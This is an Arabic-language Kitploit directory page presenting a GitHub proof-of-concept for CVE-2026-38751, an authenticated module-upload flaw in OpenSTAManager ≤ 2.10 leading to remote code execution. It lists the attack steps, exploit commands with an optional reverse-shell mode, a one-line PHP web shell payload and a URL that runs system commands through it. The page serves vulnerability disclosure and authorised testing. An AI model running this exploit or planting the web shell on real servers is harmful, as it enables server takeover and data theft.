Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-38751-OpenSTAManager-Arbitrary-File-Upload-PoC — يحتوي هذا المستودع على استغلال لإثبات المفهوم (PoC) لـ CVE-2026-38751، والذي يؤثر على OpenSTAManager ≤ 2.10. تسمح الثغرة للمهاجم المُوثَّق بتحميل وحدة ضارة عبر وظيفة تحديث الوحدة، مما يؤدي إلى تحميل ملف عشوائي وتنفيذ تعليمات برمجية عن بُعد (RCE). | Kitploit
أدوات/GitHubGitHub/mkps/cve-2026-38751-openstamanager-arbitrary-file-upload-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubmkps/cve-2026-38751-openstamanager-arbitrary-file-upload-poc

CVE-2026-38751-OpenSTAManager-Arbitrary-File-Upload-PoC

يحتوي هذا المستودع على استغلال لإثبات المفهوم (PoC) لـ CVE-2026-38751، والذي يؤثر على OpenSTAManager ≤ 2.10. تسمح الثغرة للمهاجم المُوثَّق بتحميل وحدة ضارة عبر وظيفة تحديث الوحدة، مما يؤدي إلى تحميل ملف عشوائي وتنفيذ تعليمات برمجية عن بُعد (RCE).

عرض المستودع
7منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-38751 – رفع ملف تعسفي في OpenSTAManager (إثبات المفهوم)

يحتوي هذا المستودع على استغلال إثبات المفهوم (PoC) لـ CVE-2026-38751، والذي يؤثر على OpenSTAManager ≤ 2.10. تسمح الثغرة لمهاجم مصادق برفع وحدة ضارة عبر وظيفة تحديث الوحدة، مما يؤدي إلى رفع ملف تعسفي وتنفيذ تعليمات برمجية عن بُعد (RCE).

مرجع CVE

  • إدخال MITRE CVE (سجل الإفصاح الأول): https://www.cve.org/CVERecord?id=CVE-2026-38751
  • قاعدة بيانات الثغرات NVD (NIST): https://nvd.nist.gov/vuln/detail/CVE-2026-38751
  • قاعدة بيانات تنبيهات GitHub https://github.com/advisories/GHSA-rm34-fg4m-39mw

البرنامج المتأثر

  • OpenSTAManager ≤ 2.10
  • نظام تحديث الوحدة (modules/aggiornamenti/upload_modules.php)

وصف الثغرة

تتيح وظيفة تحديث الوحدة للمستخدمين المصادقين رفع وحدات قائمة على ZIP دون التحقق السليم من محتويات الملف أو حدود التنفيذ. يمكن للمهاجم صياغة وحدة ضارة تحتوي على حمولات PHP، والتي يتم نشرها بعد ذلك في جذر الويب وتنفيذها عبر سياق التطبيق. يؤدي هذا إلى:

  • رفع ملف تعسفي (CWE-434)
  • تنفيذ تعليمات برمجية عن بُعد عبر ملفات PHP المرفوعة
  • اختراق كامل لسياق التطبيق

تدفق الهجوم (مستوى عالٍ)

  1. المصادقة على OpenSTAManager
  2. رفع أرشيف ZIP وحدة مصممة
  3. تشغيل عملية تثبيت/تحديث الوحدة
  4. الوصول إلى حمولة PHP المرفوعة عبر جذر الويب
  5. تنفيذ أوامر تعسفية على الخادم

##التأثير يسمح الاستغلال الناجح بما يلي:

  • تنفيذ أوامر عن بُعد
  • اختراق خادم الويب
  • تسريب البيانات
  • استحواذ كامل على التطبيق اعتمادًا على الصلاحيات

المتطلبات

  • حساب مستخدم مصادق صالح
  • تمكين الوصول إلى وظيفة تحديث الوحدة

الاستخدام (إثبات المفهوم)

  1. توليد وحدة ضارة
python exploit.py --build

ينشئ:

update.zip
└── run/
    ├── MODULE
    └── evil.php
  1. تشغيل الاستغلال
python exploit.py <username> <password> <target_url>

وضع الصدفة العكسية اختياري:

python exploit.py <username> <password> <target_url> --lhost <IP> --lport <PORT>

مثال على الحمولة

<?php
isset($_GET['cmd']) && system($_GET['cmd']);
?>

التحقق

إذا نجحت، يقوم نقطة النهاية التالية بتنفيذ أوامر النظام: /modules/run/evil.php?cmd=id

مراجع MITRE / NVD

  • سجل CVE من MITRE: https://www.cve.org/CVERecord?id=CVE-2026-38751
  • إدخال NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-38751

إخلاء المسؤولية

هذا المشروع مخصص لـ:

  • الأغراض التعليمية
  • اختبار الأمن المصرح به
  • بيئات البحث

لا تستخدم ضد أنظمة دون إذن صريح.

ملاحظات

قد يختلف الكشف حسب تكوين الخادم. قد تقوم بعض النشرات بتعطيل تنفيذ PHP المباشر في أدلة الوحدات. قد يتطلب توقيت تنشيط الوحدة إعادة محاولات.

شكر وتقدير

  • برنامج MITRE CVE
  • قاعدة بيانات الثغرات الوطنية NIST (NVD)
  • مطوري مشروع OpenSTAManager
  • https://github.com/fuutianyii/poc (أول إثبات مفهوم)
تنزيل الأداة